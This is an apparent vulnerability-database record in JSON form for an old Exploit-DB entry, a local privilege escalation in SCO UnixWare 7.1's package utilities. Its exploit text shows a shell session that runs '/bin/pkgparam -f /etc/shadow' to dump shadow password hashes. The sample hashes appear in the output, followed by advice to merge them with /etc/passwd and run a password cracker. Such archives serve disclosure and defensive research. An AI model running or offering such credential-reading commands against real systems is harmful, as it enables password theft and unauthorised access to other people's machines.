DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:19658", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "SCO Unixware 7.1 - 'pkg' Local Privilege Escalation", "description": "", "published": "1999-12-03T00:00:00", "modified": "1999-12-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/19658", "reporter": "Brock Tellier", "references": [], "cvelist": ["1999-0828"], "immutableFields": [], "lastseen": "2022-08-16T09:04:29", "viewCount": 12, "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678800746}, "_internal": {"score_hash": "be23aca268ce16b44e9002267029599b"}, "sourceHref": "https://www.exploit-db.com/download/19658", "sourceData": "source: https://www.securityfocus.com/bid/850/info\r\n\r\nCertain versions of SCO's Unixware (only version 7.1 was tested) ship with a series of package install/removal utilities which due to design issues under the SCO UnixWare operating system may read any file on the system regardless of their permission set. This is due to the package commands (pkginfo, pkgcat, pkgparam, etc.) having extended access due to Discretionary Access\r\nControls (DAC) via /etc/security/tcb/privs. This mechanism is explained more thoroughly in the original message to Bugtraq which is listed in full in the 'Credit' section of this vulnerability entry.\r\n\r\nbash-2.02$ ls -la /bin/pkgparam\r\n-r-xr-xr-x 1 root sys 166784 May 21 1999\r\n/bin/pkgparam\r\nbash-2.02$ /bin/pkgparam -f /etc/shadow\r\nDy0l3OC7XHsj.:10925::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\nNP:6445::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\nBgusHRQZ9MH2U:10878::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\n*LK*:::::::\r\nnv.Xrh2V3vArc:10882::::::\r\nozT.yeRe1/dxY:10882::::::\r\nRinwpQfqabYbc:10928::::::\r\nbash-2.02$\r\n\r\nNow just concatenate the first field of /etc/passwd with this file and run your favorite cracker.", "osvdbidlist": ["9316"], "exploitType": "local", "verified": true}

{}